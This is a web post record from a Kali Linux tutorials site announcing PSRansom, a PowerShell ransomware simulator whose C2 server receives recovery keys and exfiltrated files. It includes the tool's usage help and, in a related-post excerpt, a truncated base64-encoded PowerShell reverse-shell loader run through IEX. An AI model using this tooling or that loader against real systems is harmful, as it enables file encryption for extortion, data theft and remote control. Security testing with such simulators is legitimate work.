{"id":24174,"date":"2022-05-05T10:23:02","date_gmt":"2022-05-05T10:23:02","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=24174"},"modified":"2022-05-05T10:23:05","modified_gmt":"2022-05-05T10:23:05","slug":"psransom","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/psransom\/","title":{"rendered":"PSRansom : PowerShell Ransomware Simulator With C2 Server"},"content":{"rendered":"\n<p><strong>PSRansom<\/strong>&nbsp;is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP.<\/p>\n\n\n\n<p>All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time.<\/p>\n\n\n\n<h1 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/JoelGMSec\/PSRansom#requirements\"><\/a>Requirements<\/h1>\n\n\n\n<ul class=\"wp-block-list\"><li>PowerShell 4.0 or greater<\/li><\/ul>\n\n\n\n<h1 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/JoelGMSec\/PSRansom#download\"><\/a>Download<\/h1>\n\n\n\n<p>It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>git clone https:\/\/github.com\/JoelGMSec\/PSRansom<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Usage<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>.\\PSRansom -h<br>_ <em>_ <br>|<\/em> \\\/ <em>|| _ \\ _ _ _ <\/em>_ _ | |<em>) _ | |<\/em>) \/ <em>&#8216; | &#8216;<\/em> \\\/ |\/ _ | &#8216;_ &#8216; _ \\ | \/ <em>) | _ &lt; (| | | | _ \\ () | | | | | | || |\/|<\/em>| ___,<em>|<\/em>| |<em>|<\/em>\/_\/|<em>| |<\/em>| |_|<br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; by @JoelGMSec &#8212;&#8212;&#8212;&#8212;&#8212;-<br>Info: This tool helps you simulate encryption process of a<br>generic ransomware in PowerShell with C2 capabilities<br>Usage: .\\PSRansom.ps1 -e Directory -s C2Server -p C2Port<br>Encrypt all files &amp; sends recovery key to C2Server<br>Use -x to exfiltrate and decrypt files on C2Server<br>.\\PSRansom.ps1 -d Directory -k RecoveryKey<br>Decrypt all files with recovery key string<br>Warning: All info will be sent to the C2Server without any encryption<br>You need previously generated recovery key to retrieve files<\/strong><\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/JoelGMSec\/PSRansom\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>PSRansom&nbsp;is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements is encrypted [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":24182,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[516,5088,5087,5089],"class_list":["post-24174","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-c2-server","tag-powershell-ransomware","tag-psransom","tag-simulator"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PSRansom : PowerShell Ransomware Simulator With C2 Server<\/title>\n<meta name=\"description\" content=\"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/psransom\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PSRansom : PowerShell Ransomware Simulator With C2 Server\" \/>\n<meta property=\"og:description\" content=\"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/psransom\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-05T10:23:02+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-05-05T10:23:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"PSRansom : PowerShell Ransomware Simulator With C2 Server\",\"datePublished\":\"2022-05-05T10:23:02+00:00\",\"dateModified\":\"2022-05-05T10:23:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/\"},\"wordCount\":203,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\",\"keywords\":[\"C2 Server\",\"PowerShell Ransomware\",\"PSRansom\",\"Simulator\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/psransom\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/psransom\/\",\"name\":\"PSRansom : PowerShell Ransomware Simulator With C2 Server\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\",\"datePublished\":\"2022-05-05T10:23:02+00:00\",\"dateModified\":\"2022-05-05T10:23:05+00:00\",\"description\":\"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/psransom\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PSRansom : PowerShell Ransomware Simulator With C2 Server","description":"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/psransom\/","og_locale":"en_US","og_type":"article","og_title":"PSRansom : PowerShell Ransomware Simulator With C2 Server","og_description":"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.","og_url":"https:\/\/kalilinuxtutorials.com\/psransom\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-05-05T10:23:02+00:00","article_modified_time":"2022-05-05T10:23:05+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/psransom\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/psransom\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"PSRansom : PowerShell Ransomware Simulator With C2 Server","datePublished":"2022-05-05T10:23:02+00:00","dateModified":"2022-05-05T10:23:05+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/psransom\/"},"wordCount":203,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","keywords":["C2 Server","PowerShell Ransomware","PSRansom","Simulator"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/psransom\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/psransom\/","url":"https:\/\/kalilinuxtutorials.com\/psransom\/","name":"PSRansom : PowerShell Ransomware Simulator With C2 Server","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","datePublished":"2022-05-05T10:23:02+00:00","dateModified":"2022-05-05T10:23:05+00:00","description":"PSRansom\u00a0is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/psransom\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/psransom\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDrh4EO23JFb8MWZPZx5cbPAV07PPS42nQe-sz4_Og1DKq8_RUAeEAcRarBG1fBr4hrpc6x4ZsGmekbDsVqNCqxojPD0yWwPf3IbvBWY49z1pdWWnNq3YH6-aX7aLDTyxCKnPkLR67cloujnzqkbQJF86UMJXMTSDNq7d1K724KIH4jaLx-9calvjR\/s728\/PSRansom%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":25768,"url":"https:\/\/kalilinuxtutorials.com\/ransomware-simulator\/","url_meta":{"origin":24174,"position":0},"title":"Ransomware-Simulator : Ransomware Simulator Written In Golang","author":"R K","date":"July 5, 2022","format":false,"excerpt":"Ransomware-Simulator, the goal of this repository is to provide a simple, harmless way to check your AV's protection on ransomware. This tool simulates typical ransomware behaviour, such as: Staging from a Word document macroDeleting Volume Shadow CopiesEncrypting documents (embedded and dropped by the simulator into a new folder)Dropping a ransomware\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjBSN4vq8IGlv_k5Rw127DT9VpdPE2nbCgYIe0p5RP6dIHWIryTAlVVY1j6pqY1JVvgf0OsfUfWbXSIsNrFRNdxnlgJko-WQkuNDSf37OMGuadxpAqLscZq1eY-v3GnqQXs2Mnj8uCMaOkkB-g1UePQfrrPYpUqpeJu_pY32MHT-iwWAr6WHMZdMBZh\/s728\/6a4a49_d13bb31280524c17aa0617ba59c98210_mv2.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjBSN4vq8IGlv_k5Rw127DT9VpdPE2nbCgYIe0p5RP6dIHWIryTAlVVY1j6pqY1JVvgf0OsfUfWbXSIsNrFRNdxnlgJko-WQkuNDSf37OMGuadxpAqLscZq1eY-v3GnqQXs2Mnj8uCMaOkkB-g1UePQfrrPYpUqpeJu_pY32MHT-iwWAr6WHMZdMBZh\/s728\/6a4a49_d13bb31280524c17aa0617ba59c98210_mv2.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjBSN4vq8IGlv_k5Rw127DT9VpdPE2nbCgYIe0p5RP6dIHWIryTAlVVY1j6pqY1JVvgf0OsfUfWbXSIsNrFRNdxnlgJko-WQkuNDSf37OMGuadxpAqLscZq1eY-v3GnqQXs2Mnj8uCMaOkkB-g1UePQfrrPYpUqpeJu_pY32MHT-iwWAr6WHMZdMBZh\/s728\/6a4a49_d13bb31280524c17aa0617ba59c98210_mv2.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjBSN4vq8IGlv_k5Rw127DT9VpdPE2nbCgYIe0p5RP6dIHWIryTAlVVY1j6pqY1JVvgf0OsfUfWbXSIsNrFRNdxnlgJko-WQkuNDSf37OMGuadxpAqLscZq1eY-v3GnqQXs2Mnj8uCMaOkkB-g1UePQfrrPYpUqpeJu_pY32MHT-iwWAr6WHMZdMBZh\/s728\/6a4a49_d13bb31280524c17aa0617ba59c98210_mv2.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":5276,"url":"https:\/\/kalilinuxtutorials.com\/reversetcpshell\/","url_meta":{"origin":24174,"position":1},"title":"ReverseTCPShell : PowerShell ReverseTCP Shell, Client &#038; Server","author":"R K","date":"June 8, 2019","format":false,"excerpt":"ReverseTCPShell is a tool for Reverse Encrypted (AES 256-bit) Shell over TCP using PowerShell SecureString. Attacker (C2-Server Listener): PS> .\\ReverseTCP.ps1 Target (Client): CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQ